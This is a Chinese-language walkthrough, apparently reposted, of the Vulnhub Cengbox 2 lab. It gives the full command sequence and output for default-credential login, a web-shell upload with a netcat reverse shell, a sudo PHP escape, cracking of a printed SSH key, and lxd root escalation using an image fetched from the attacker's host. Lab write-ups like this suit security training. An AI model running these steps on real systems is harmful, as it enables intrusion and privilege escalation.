Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)

这篇具有很好参考价值的文章主要介绍了Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Cengbox 2

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                              
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:03      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:ea:c7:5b      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.254  08:00:27:ee:62:de      1      60  PCS Systemtechnik GmbH            

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 20:09 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.253
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             209 May 23  2020 note.txt
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
|   256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_  256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
MAC Address: 08:00:27:EE:62:DE (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ftp 192.168.56.254 
Connected to 192.168.56.254.
220 (vsFTPd 3.0.3)
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||56112|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        119          4096 May 23  2020 .
drwxr-xr-x    2 0        119          4096 May 23  2020 ..
-rw-r--r--    1 0        0             209 May 23  2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||5618|)
150 Opening BINARY mode data connection for note.txt (209 bytes).
100% |****************************************************************************************************************|   209      488.28 KiB/s    00:00 ETA
226 Transfer complete.

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat note.txt      
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.

I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.

Aaron

域名:ceng-company.vm

可能的用户名: kevin, aaron

其他:kevin可能密码比较弱

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ curl http://192.168.56.254           
<!doctype html>
<title>Site Maintenance</title>
<style>
  body { text-align: center; padding: 150px; }
  h1 { font-size: 50px; }
  body { font: 20px Helvetica, sans-serif; color: #333; }
  article { display: block; text-align: left; width: 650px; margin: 0 auto; }
  a { color: #dc8100; text-decoration: none; }
  a:hover { color: #333; text-decoration: none; }
</style>

<article>
        <h1>Site Maintenance</h1>
    <div>
        <p>Sorry, We don't serve yet. You can check later the site. Regards </p> <p>&mdash; Ceng Company Team</p>
    </div>
</article>

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts                                        
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  ceng-company.vm

但是访问域名ceng-company.vm,返回页面内容没有发生变化

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://ceng-company.vm
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt,js,sh
[+] Timeout:                 10s
===============================================================
2023/06/22 20:17:02 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 555]
/.html                (Status: 403) [Size: 295]
/.php                 (Status: 403) [Size: 294]
/.html                (Status: 403) [Size: 295]
/.php                 (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 303]
Progress: 1320683 / 1323366 (99.80%)

目录扫描没有啥收获,是否存在子域名?

─(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ wfuzz -c -u 'ceng-company.vm' -H 'Host:FUZZ.ceng-company.vm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 76=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================

000000001:   400        12 L     53 W       422 Ch      "# directory-list-2.3-medium.txt"                                                           
000000003:   400        12 L     53 W       422 Ch      "# Copyright 2007 James Fisher"                                                             
000000007:   400        12 L     53 W       422 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                           
000000013:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000011:   400        12 L     53 W       422 Ch      "# Priority ordered case sensative list, where entries were found"                          
000000010:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000009:   400        12 L     53 W       422 Ch      "# Suite 300, San Francisco, California, 94105, USA."                                       
000000012:   400        12 L     53 W       422 Ch      "# on atleast 2 different hosts"                                                            
000000006:   400        12 L     53 W       422 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                             
000000005:   400        12 L     53 W       422 Ch      "# This work is licensed under the Creative Commons"                                        
000000008:   400        12 L     53 W       422 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                                
000000002:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000004:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000259:   403        11 L     32 W       296 Ch      "admin"              

发现admin子域名返回状态码为403

将该子域名加入到/etc/hosts文件:

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  ceng-company.vm
192.168.56.254  admin.ceng-company.vm

访问admin.ceng-company.vm返回“Forbidden",是否应该扫描一下目录:

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://admin.ceng-company.vm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              js,php,html,txt,bak,sh
[+] Timeout:                 10s
===============================================================
2023/06/22 20:31:01 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 301]
/.php                 (Status: 403) [Size: 300]
/.html                (Status: 403) [Size: 301]
/.php                 (Status: 403) [Size: 300]
/server-status        (Status: 403) [Size: 309]
/gila                 (Status: 301) [Size: 329] [--> http://admin.ceng-company.vm/gila/]

──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/gila/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================

终于找到了登录的入口

尝试用户名为kevin@ceng-company.vm, 密码为admin

上传shell.php,发现被保存在assets目录下

访问下面的url:

http://admin.ceng-company.vm/gila/assets/shell.php

成功得到了shell

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nc -nlvp 5555                                         
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 40688
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 17:39:51 up 34 min,  0 users,  load average: 1.04, 4.65, 3.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cengbox:/$ cd /home
cd /home
www-data@cengbox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root    root       4.0K May 23  2020 .
drwxr-xr-x 23 root    root       4.0K May 23  2020 ..
drwxr-x---  4 mitnick developers 4.0K May 25  2020 mitnick
drwxr-xr-x  4 swartz  swartz     4.0K May 26  2020 swartz
www-data@cengbox:/home$ cd mitnick
cd mitnick
bash: cd: mitnick: Permission denied
www-data@cengbox:/home$ cd swartz
cd swartz
www-data@cengbox:/home/swartz$ ls -alh
ls -alh
total 44K
drwxr-xr-x 4 swartz swartz     4.0K May 26  2020 .
drwxr-xr-x 4 root   root       4.0K May 23  2020 ..
-rw------- 1 swartz swartz        1 May 26  2020 .bash_history
-rw-r--r-- 1 swartz swartz      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 swartz swartz     3.7K Aug 31  2015 .bashrc
drwx------ 2 swartz swartz     4.0K May 23  2020 .cache
drwx------ 2 swartz developers 4.0K May 26  2020 .gnupg
-rw------- 1 swartz developers    1 May 26  2020 .php_history
-rw-r--r-- 1 swartz swartz      655 May 16  2017 .profile
-rw------- 1 swartz developers    1 May 26  2020 .viminfo
-rwxr-xr-x 1 swartz swartz       20 May 26  2020 runphp.sh
www-data@cengbox:/home/swartz$ cat runphp.sh
cat runphp.sh
#!/bin/bash

php -a
www-data@cengbox:/home/swartz$ 

www-data@cengbox:/var/www/admin/gila$ cat config.php
cat config.php
<?php

$GLOBALS['config'] = array (
  'db' => 
  array (
    'host' => 'localhost',
    'user' => 'root',
    'pass' => 'SuperS3cR3TPassw0rd1!',
    'name' => 'gila',
  ),
  'permissions' => 
  array (
    1 => 
    array (
      0 => 'admin',
      1 => 'admin_user',
      2 => 'admin_userrole',
    ),
  ),
  'packages' => 
  array (
    0 => 'blog',
  ),
  'base' => 'http://admin.ceng-company.vm/gila/',
  'theme' => 'gila-blog',
  'title' => 'Gila CMS',
  'slogan' => 'An awesome website!',
  'default-controller' => 'blog',
  'timezone' => 'America/Mexico_City',
  'ssl' => '',
  'env' => 'pro',
  'check4updates' => 1,
  'language' => 'en',
  'admin_email' => 'kevin@ceng-company.vm',
  'rewrite' => true,

www-data@cengbox:/$ sudo -l 
sudo -l
Matching Defaults entries for www-data on cengbox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on cengbox:
    (swartz) NOPASSWD: /home/swartz/runphp.sh
www-data@cengbox:/$ sudo -u swartz /home/swartz/runphp.sh
sudo -u swartz /home/swartz/runphp.sh
Interactive mode enabled

No entry for terminal type "unknown";
using dumb terminal settings.
php > system("/bin/bash")
system("/bin/bash")
php > id
id
php > ;
;
PHP Parse error:  syntax error, unexpected 'id' (T_STRING) in php shell code on line 2
php > system("/bin/bash");
system("/bin/bash");
swartz@cengbox:/$ id
id
uid=1001(swartz) gid=1002(developers) groups=1002(developers)
swartz@cengbox:/$ 

swartz@cengbox:/home/mitnick$ cd .ssh 
cd .ssh
swartz@cengbox:/home/mitnick/.ssh$ ls -alh
ls -alh
total 20K
drwxr-x--- 2 mitnick developers 4.0K May 25  2020 .
drwxr-x--- 4 mitnick developers 4.0K May 25  2020 ..
-rw-r--r-- 1 mitnick developers  397 May 25  2020 authorized_keys
-rw-r--r-- 1 mitnick developers 1.8K May 25  2020 id_rsa
-rw-r--r-- 1 mitnick developers  397 May 25  2020 id_rsa.pub
swartz@cengbox:/home/mitnick/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,21425CA12E394F02C77645793C350D91

jOzfhmCwJQ8eqkzxuAgaXxy8Nh0AL1NR2dXz0tZVbSRRKdUcAeXQFkNYdAH+InjR
mg0FUtcz69l5iomrBHd71ZnK4iQMVcZZ37r8fAQppvZVGhKbf5DGmnyDZiTxGtdv
O6kEQOXOAVUce+bMDEgChMEdORmk2yisizjDi9IMttWQ3VMyaHoyRp2UOCjntZPC
KcpQMGjWJEos3ZrlIrfX/FSkfT0QkwdzkigeJsC7zH0AioH55tdfAY8d33AJuSQ0
7I7z5qMfn7tfNd8n642xFGnRV2YMCYiO8XB0f5OJz67T4doagB985ZNDtqJdxkoF
kXlqdvs1KJzCAMu9m0m4UV7ZR7qmYKiFXnEkl/hE9i3CF9S6UOjKKRZq26TpJVj4
a4WJ+yauszPVI9KlnB7X9g5cd3Xoe04ROWbaVhx0tv3ipjcbGOPcuQudiMH8P0rj
pXI0YD/nDSV9gCqfgi0wJTag8LK+4ZUENHu3ThukuONCGZpkdJg/UETu9m8Cl8CR
pa4khXbI+1J7frvqUFq+op3CBT4GccKUbD4B/Sa2BLjsOV75A/tpffr2ROo8KxaL
HFHJUqwhTCk6qp5Hx6tQWtaUQ7gdOJ1BMARts/x3rGpphdmSwqZqusdrw/KS3TbH
VkjpO5lABvEMGl2/HbB2flEZk+fkJ3YNq78+IQSxNSDFPsAIMySFmro+tf9X7KWu
hna6795X13c+WdE5hEsK6X2bOkZhFln/6Rkz5BsWNlaBVQwYfthfepN+e4NwdtcT
e/NZt/Cppe+J74ABmC8FyKVr+sbnb2MWWwg2nQ9aPEcDinjWk7ALtJbwIG46Udb9
l/c8/RSot4rRA3ADHj5JZtEAnnrwCHO7cc4yGLEJOneSPxz4yW8vSGDd7iAWjYuE
Y0CDY6iH2cvi3rrVrfUZ1beHMcegRtsTgPj2tbd7x4FD6xY+Vha+Va/OV6F7kuE7
fgS5uJs/WqCVemQWKLfa22AMeCRn5qB9AT1gAGbH5oFlrOtOvvbpZsdiRSp86mx5
/Pzrio/5e0kZ1b4+PF1cUOzFJOVOADl8hGQxE9LYOozxKGdSEP1oJOhThCGQVK8W
cQZ91RSt5tbQbhO3T4r8whOgOFyf3N/jEJ2IBzFKDZAqn0oxUzQFcBnsYIMhO29F
bTH6WyWaIy97HxSEzMmMUJo78n8uptNkglFPYp0LTzTEXsEYC6WxGBIihXQHEJlJ
1XxTCMoZFkZ2IpL9TmRtdWcqKBjiXLXuPjpMaIlg3tL8AEqR92stCPpyIVkfsxRf
j+FgaA97zTv8je+uGIAyv3fl3W69LOsMSTGwZutxngBsyhK3FbzF5r1c6c55jxXK
Tj+QuvPjLwGNT9KQ3XT4oGe5KSiSQ3ZhA4K1AhGyfCxhA2hdK7Y9RZVxKISCzjsY
4oNeFNZKIhTIWITNcr4/ebGiQuyLyOQpTgP6kpiLDYcZlPdIjdBAEjF+5rVcuxfB
xtHilk7LLiLarD6lFaF4bYoB2lwW0ioUzvZYUjLIT7RyrDa6tnidXI9aVAWgLFor
xi3Ed0lgkxkFm6AFQ0Zq1R8MqI4+6apX4nqqV/ybGpBFwpjgI//mOlHf9kdxp0Pk
-----END RSA PRIVATE KEY-----

将id_rsa文件内容拷贝并在Kali Linux本地创建id_rsa文件,修改权限,发现有口令保护,利用john工具破解,从而成功登录mitnick:

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ chmod 400 id_rsa     
 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh -i id_rsa mitnick@192.168.56.254                           
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:uZvIZKaW470Qvua+TX3Wa1NqBXo7T/pWydAbAvGFVSQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 

                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh2john id_rsa > hash              
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash     
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
legend           (id_rsa)     
1g 0:00:00:00 DONE (2023-06-22 20:57) 2.702g/s 5232p/s 5232c/s 5232C/s amore..bubba1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh -i id_rsa mitnick@192.168.56.254                 
Enter passphrase for key 'id_rsa': 

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

166 packages can be updated.
119 updates are security updates.

Last login: Tue May 26 07:12:16 2020 from 192.168.0.14
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

mitnick@cengbox:~$ id
uid=1000(mitnick) gid=1002(developers) groups=1002(developers),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
mitnick@cengbox:~$ ls -alh
total 48K
drwxr-x--- 4 mitnick developers 4.0K May 25  2020 .
drwxr-xr-x 4 root    root       4.0K May 23  2020 ..
-rw------- 1 mitnick mitnick       1 May 26  2020 .bash_history
-rw-r--r-- 1 mitnick mitnick     220 May 23  2020 .bash_logout
-rw-r--r-- 1 mitnick mitnick    3.7K May 23  2020 .bashrc
drwx------ 2 mitnick mitnick    4.0K May 23  2020 .cache
-rw------- 1 mitnick mitnick     505 May 23  2020 .mysql_history
-rw------- 1 mitnick mitnick       1 May 26  2020 .php_history
-rw-r--r-- 1 mitnick mitnick     655 May 23  2020 .profile
drwxr-x--- 2 mitnick developers 4.0K May 25  2020 .ssh
-rw------- 1 mitnick mitnick      33 May 23  2020 user.txt
-rw------- 1 mitnick mitnick       1 May 26  2020 .viminfo
mitnick@cengbox:~$ cat user.txt
a10333b0b7c3f914e8c446fd8e9cd362
mitnick@cengbox:~$ 


由于mitnick用户属于lxd组,因此利用Lxd实现本地提权:文章来源地址https://www.toymoban.com/news/detail-496386.html

mitnick@cengbox:/tmp$ wget http://192.168.56.253:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-06-22 18:02:36--  http://192.168.56.253:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_0139.tar.g 100%[============================================================================>]   3.11M  --.-KB/s    in 0.01s   

2023-06-22 18:02:36 (284 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

mitnick@cengbox:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
mitnick@cengbox:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
mitnick@cengbox:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
mitnick@cengbox:/tmp$ lxc start ignite
mitnick@cengbox:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls -alh
total 96K    
drwxr-xr-x   23 root     root        4.0K May 23  2020 .
drwxr-xr-x    3 root     root        4.0K Jun 23 01:03 ..
drwxr-xr-x    2 root     root        4.0K May 23  2020 bin
drwxr-xr-x    3 root     root        4.0K May 23  2020 boot
drwxr-xr-x   18 root     root        3.8K Jun 23 00:05 dev
drwxr-xr-x   92 root     root        4.0K May 26  2020 etc
drwxr-xr-x    4 root     root        4.0K May 23  2020 home
lrwxrwxrwx    1 root     root          33 May 23  2020 initrd.img -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x   22 root     root        4.0K May 25  2020 lib
drwxr-xr-x    2 root     root        4.0K May 23  2020 lib64
drwx------    2 root     root       16.0K May 23  2020 lost+found
drwxr-xr-x    3 root     root        4.0K May 23  2020 media
drwxr-xr-x    2 root     root        4.0K Feb 26  2019 mnt
drwxr-xr-x    2 root     root        4.0K May 25  2020 opt
dr-xr-xr-x  153 root     root           0 Jun 23 00:05 proc
drwx------    3 root     root        4.0K May 26  2020 root
drwxr-xr-x   27 root     root         960 Jun 23 01:03 run
drwxr-xr-x    2 root     root       12.0K May 23  2020 sbin
drwxr-xr-x    2 root     root        4.0K May 23  2020 snap
drwxr-xr-x    3 root     root        4.0K May 23  2020 srv
dr-xr-xr-x   13 root     root           0 Jun 23 00:54 sys
drwxrwxrwt    9 root     root        4.0K Jun 23 01:04 tmp
drwxr-xr-x   10 root     root        4.0K May 23  2020 usr
drwxr-xr-x   15 root     root        4.0K May 23  2020 var
lrwxrwxrwx    1 root     root          30 May 23  2020 vmlinuz -> boot/vmlinuz-4.4.0-142-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 36K    
drwx------    3 root     root        4.0K May 26  2020 .
drwxr-xr-x   23 root     root        4.0K May 23  2020 ..
-rw-------    1 root     root           0 May 26  2020 .bash_history
-rw-r--r--    1 root     root        3.0K Oct 22  2015 .bashrc
drwxr-xr-x    2 root     root        4.0K May 23  2020 .nano
-rw-------    1 root     root           1 May 26  2020 .php_history
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
-rw-r--r--    1 root     root          66 May 23  2020 .selected_editor
-rw-------    1 root     root           1 May 26  2020 .viminfo
-rw-r--r--    1 root     root         518 May 23  2020 root.txt
/mnt/root/root # cat root.txt
  _____ ______             ____            ___  
 / ____|  ____|           |  _ \          |__ \ 
| |    | |__   _ __   __ _| |_) | _____  __  ) |
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ / / / 
| |____| |____| | | | (_| | |_) | (_) >  < / /_ 
 \_____|______|_| |_|\__, |____/ \___/_/\_\____|
                      __/ |                     
                     |___/                      

I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_

de89782fe4e8bf2198a022ae7f50613e
/mnt/root/root # 

到了这里,关于Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之Infosec Warrior靶机详细测试过程(不同的思路)

    作者: jason huawen 名称:InfoSecWarrior CTF 2020: 01 地址: 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.253 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(HTTP) 接下里看能否扫码出目录或者文件? cmd.php文件被重定向到外网的网站。 但是cmd.php看上去就是有命令

    2023年04月17日
    浏览(36)
  • Vulnhub之Maskcrafter靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。 目标主机没有NFS共享目录。 Kali Linux访问80端口,为用户登录界面,用admin\\\' or 1=1 -- 即可轻松绕过。 登录成功后,在页面源代码中有注释: 访问

    2023年04月10日
    浏览(33)
  • Vulnhub之Gigroot靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?) 将wp.gitroot.vuln加入/etc/hosts文件中: 此时访问url,从返回页面可知目标为Wordpress站点: 因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运

    2024年02月01日
    浏览(38)
  • Vulnhub之Healthcare靶机详细测试过程

    作者: jason huawen 名称: 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有2个开放端口:21(ftp)、80(http) FTP不允许匿名访问 FTP服务为ProFTPD,可能存在mod_copy漏洞 robots.txt存在/admin/条目,但是访问该目录,却返回页面不存在的错误

    2023年04月22日
    浏览(53)
  • Vulnhub之Inclusiveness靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 对FTP服务的信息收集结果如下: 目标主机允许匿名访问 匿名用户允许上传文件 匿名用户无法变换目录 FTP服务版本没有漏洞可利用 接下来做一下目

    2023年04月19日
    浏览(43)
  • Vulnhub之GreenOptics靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http) 说明需要添加主机记录到/etc/hosts文件: 再次访问: 返回页面为用户登录界面,10000端口的信息收集暂时告一段落。 nikto没有得到

    2024年02月01日
    浏览(40)
  • Vulnhub之Funbox 1靶机详细测试过程

    作者:jason_huawen 名称:Funbox: 1 地址: 利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164 NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?) 目标主机不允许匿名访问; FTP服务软件维ProFTDd,但版本未知 Kali Linux上浏览器访问

    2024年02月03日
    浏览(36)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(43)
  • Vulnhub之Grotesque3靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.156 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 浏览器访问80端口,返回页面图片中有提示md5? 可能指的是目录字典需要md5加密? 然后去掉每行结果的\\\'-\\\' 然后删除空格: 利用gobuster工具发现了文件 但是

    2023年04月27日
    浏览(36)
  • Vulnhub之Gain Power靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http) nikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。 但是图片分析没有得到任何有意的结果。 假设用户

    2024年02月02日
    浏览(51)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包